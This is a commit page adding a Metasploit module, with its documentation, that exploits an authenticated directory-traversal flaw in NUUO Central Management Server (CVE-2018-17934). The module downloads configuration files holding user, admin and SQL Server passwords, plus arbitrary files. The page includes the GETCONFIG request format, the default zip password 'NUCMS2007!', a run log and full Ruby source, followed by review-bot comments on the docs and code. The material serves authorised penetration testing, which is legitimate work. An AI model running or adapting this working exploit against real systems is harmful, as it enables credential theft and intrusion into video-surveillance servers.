Commit
Land #11293, Add Nuuo CMS file download
1 parent c9467ea, commit 80147f5. Showing 2 changed files with 157 additions and 0 deletions.
documentation/modules/auxiliary/gather/nuuo_cms_file_download.md (71 changes: 71 additions & 0 deletions)
@@ -0,0 +1,71 @@ | ||
## Description | ||
|
||
Nuuo CMS Authenticated Arbitrary File Download | ||
|
||
The GETCONFIG verb is used by a CMS client to obtain configuration files and other resources from the CMS server. An example request is below: | ||
|
||
``` | ||
GETCONFIG NUCM/1.0 | ||
FileName: <filename> | ||
FileType: <number> | ||
User-Session-No: <session-number> | ||
``` | ||
|
||
The FileType determines the directory where the file will be downloaded from. "FileType: 0" will download from the base installation directory (CMS_DIR), while "FileType: 1" will download from "<CMS_DIR>\Images\Map\". There are other defined FileType integers, but these have not been investigated in detail. | ||
|
||
The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to obtain any files off the file system, including: | ||
|
||
- CMServer.cfg, a file zipped with the password "NUCMS2007!" that contains the usernames and passwords of all the system users (enabling a less privileged user to obtain the administrator's password) | ||
- ServerConfig.cfg, another file zipped with the password "NUCMS2007!" that contains the SQL Server "sa" password as well the FTP server username and password | ||
- Any other sensitive files in the drive where CMS Server is installed. | ||
|
||
This module works in the following way: | ||
|
||
- if a SESSION number is present, uses that to login | ||
- if not, tries to authenticate with USERNAME and PASSWORD | ||
|
||
Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf. | ||
|
||
## Vulnerable Application | ||
|
||
[NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/) | ||
|
||
The following versions were tested: | ||
|
||
- 1.5.2 OK | ||
- 2.1.0 OK | ||
- 2.3.2 OK | ||
- 2.4.0 OK | ||
- 2.6.0 OK | ||
- 2.9.0 OK | ||
- 2.10.0 OK | ||
- 3.1 OK | ||
- 3.3 OK | ||
- 3.5 OK | ||
|
||
## Scenarios | ||
|
||
### Tested on Windows 10 Pro x64 running NCS Server 2.4.0 | ||
|
||
``` | ||
msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200 | ||
rhosts => 172.22.222.200 | ||
msf5 auxiliary(gather/nuuo_cms_file_download) > exploit | ||
[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg | ||
[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg | ||
[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database. | ||
[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem, | ||
[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit. | ||
[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the | ||
[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them. | ||
[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed! | ||
[*] Auxiliary module execution completed | ||
msf5 auxiliary(gather/nuuo_cms_file_download) > | ||
``` | ||
|
||
## References | ||
|
||
- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 | ||
|
||
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt |
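Review bot: the documentation is missing the `## Options` and `## Verification Steps` sections that module docs in this tree normally carry, so the `FILE` option registered by the module, and the `SESSION` / `USERNAME` / `PASSWORD` login path described under "This module works in the following way", are never documented for the user; suggest an `## Options` section listing `FILE`, `SESSION`, `USERNAME` and `PASSWORD` with what each does, and a `## Verification Steps` section (install a vulnerable CMS version from the list above, `use auxiliary/gather/nuuo_cms_file_download`, `set RHOSTS`, `run`, confirm the two .cfg files land in loot). The `## References` list also omits `CVE-2018-17934` and the seclists full-disclosure post that the module's own `'References'` metadata cites, and the bare line "Nuuo CMS Authenticated Arbitrary File Download" directly under `## Description` should either be a heading or be folded into the first paragraph.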
@@ -0,0 +1,86 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
|
||
include Msf::Exploit::Remote::Nuuo | ||
include Msf::Auxiliary::Report | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Nuuo Central Management Server Authenticated Arbitrary File Download', | ||
'Description' => %q{ | ||
The Nuuo Central Management Server allows an authenticated user to download files from the | ||
installation folder. This functionality can be abused to obtain administrative credentials, | ||
the SQL Server database password and arbitrary files off the system with directory traversal. | ||
The module will attempt to download CMServer.cfg (the user configuration file with all the user | ||
passwords including the admin one), ServerConfig.cfg (the server configuration file with the | ||
SQL Server password) and a third file if the FILE argument is provided by the user. | ||
The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules | ||
included in Metasploit, these files cannot be decrypted programmatically. The user will | ||
have to open them with zip or a similar program and provide the default password "NUCMS2007!". | ||
This module will either use a provided session number (which can be guessed with an auxiliary | ||
module) or attempt to login using a provided username and password - it will also try the | ||
default credentials if nothing is provided. | ||
All versions of CMS server up to and including 3.5 are vulnerable to this attack. | ||
}, | ||
'Author' => | ||
[ | ||
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'CVE', '2018-17934' ], | ||
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], | ||
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ], | ||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ] | ||
|
||
], | ||
'Platform' => ['win'], | ||
'Privileged' => true, | ||
'DisclosureDate' => 'Oct 11 2018')) | ||
|
||
register_options( | ||
[ | ||
OptString.new('FILE', [false, 'Additional file to download, use ..\\ to traverse directories from \ | ||
the CMS install folder']) | ||
]) | ||
end | ||
|
||
def download_file(file_name, ctype='application/zip', decrypt=true) | ||
dl_file = nucs_download_file(file_name, decrypt) | ||
file_name = file_name.gsub('..\\', '') | ||
|
||
path = store_loot(file_name, ctype, datastore['RHOST'], | ||
dl_file, file_name, "Nuuo CMS #{file_name} downloaded") | ||
print_good("Downloaded file to #{path}") | ||
end | ||
|
||
|
||
def run | ||
nucs_login | ||
|
||
unless @nucs_session | ||
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') | ||
end | ||
|
||
download_file('CMServer.cfg') | ||
download_file('ServerConfig.cfg') | ||
|
||
# note that when (if) archive/zip is included in msf, the code in the Nuuo mixin needs to be changed | ||
# see the download_file method for details | ||
print_status('The user and server configuration files were stored in the loot database.') | ||
print_status('The files are ZIP encrypted, and due to the lack of the archive/zip gem,') | ||
print_status('they cannot be decrypted in Metasploit.') | ||
print_status('You will need to open them up with zip or a similar utility, and use the') | ||
print_status('password NUCMS2007! to unzip them.') | ||
print_status('Annoy the Metasploit developers until this gets fixed!') | ||
|
||
if datastore['FILE'] | ||
filedata = download_file(datastore['FILE'], 'application/octet-stream', false) | ||
end | ||
end | ||
end |
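Review bot: `download_file` passes whatever `nucs_download_file` returns straight to `store_loot` without checking it, so a nil or empty response (for example when the requested `FILE` does not exist or the session is not allowed to read it) is still written to loot and reported with `print_good("Downloaded file to ...")`; suggest guarding it before the `store_loot` call, e.g. `if dl_file.nil? || dl_file.empty?` then `print_error("Failed to download #{file_name}")` and `return`. Two smaller points in the same hunk: `filedata = download_file(datastore['FILE'], 'application/octet-stream', false)` assigns a value that is never used (and `download_file` returns the result of `print_good`, not the file data), so drop the assignment; and the comment "see the download_file method for details" points at this module's `download_file`, which carries no details about the archive/zip change, so it should reference the method in the `Msf::Exploit::Remote::Nuuo` mixin where `nucs_download_file` is implemented. There is also a stray blank line inside the `'References'` array before the closing `],`.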